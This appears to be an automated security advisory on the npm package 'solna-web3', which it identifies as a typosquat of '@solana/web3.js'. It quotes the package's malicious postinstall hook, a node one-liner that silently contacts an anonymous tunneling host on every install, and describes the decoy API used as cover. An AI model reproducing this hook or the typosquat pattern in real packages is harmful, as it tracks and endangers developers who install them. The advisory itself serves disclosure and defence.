solna-web3 @1.5.98

Summary

Package name 'solna-web3' is a one-character typosquat of the popular '@solana/web3.js' (drops the 'a' from 'solana'). The package's only real functionality lives in a postinstall hook: package.json declares "postinstall": "node -e '(async()=>{try{await require(\"https\").get(\"rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry\")}catch(e){}})()'" , which performs an HTTPS GET to a pinggy-free.link tunneling subdomain on every npm install . Pinggy is an anonymous, ephemeral tunneling service unrelated to npm or Solana; the path /npm/-/binary/telemetry is cover-story styling that mimics npm registry paths. Errors are silently swallowed. The request leaks installer IP, timing, and install count to attacker-controlled infrastructure with no opt-in. The advertised API surface (index.js exports a single trivial getProgram() that logs and shells out solana --version ) is a stub designed to make the package look real; real behavior is the beacon. Combination of typosquat against a top-100 package + postinstall exfiltration to an anonymous tunneling host + decoy API is unambiguous supply-chain attack shape.

Source: amazon-inspector (6076f4236301f997d420c7daba9b12c035fe2866fa9fa42f59be230b5e90350a)